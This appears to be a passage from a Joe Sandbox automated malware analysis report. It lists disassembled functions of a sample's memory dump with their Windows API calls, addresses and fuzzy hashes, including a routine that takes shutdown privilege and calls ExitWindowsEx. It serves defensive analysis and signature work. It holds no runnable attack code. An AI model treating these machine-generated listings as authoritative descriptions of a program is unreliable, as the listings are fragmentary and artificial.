                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2087232378-0
                                                                                                                                                                      • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                      • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                      • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405270 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                                                                                                        • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                                                                                                        • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1658689577-0
                                                                                                                                                                      • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                                                                                      • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                                                                                                      • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                                                                                      • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                      • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                                                                                      • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                                      • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                                      • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                      • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                      • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FF03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 442123175-0
                                                                                                                                                                      • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                      • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FormatMessage
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1306739567-0
                                                                                                                                                                      • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                                                                                      • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                                                                                      • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                                                                                      • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetEndOfFile.KERNEL32(?,02008000,0040A08C,00000000), ref: 004076B3
                                                                                                                                                                        • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FF03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 734332943-0
                                                                                                                                                                      • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                                      • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                                                                                      • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                                      • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                      • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                                      • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                                                                                      • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                                      • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                      • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                      • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                                                                                      • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                      • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                      • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                      • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                                                                                      • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                                                                                      • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                                                                                                      • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                                                                                      • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                      • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                      • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                                                                      • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                      • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                      • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                                                                      • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                      • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                      • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                                      • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                                                                      • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                                      • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                      • API String ID: 107509674-3733053543
                                                                                                                                                                      • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                      • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                                                                                      • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409BEC Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
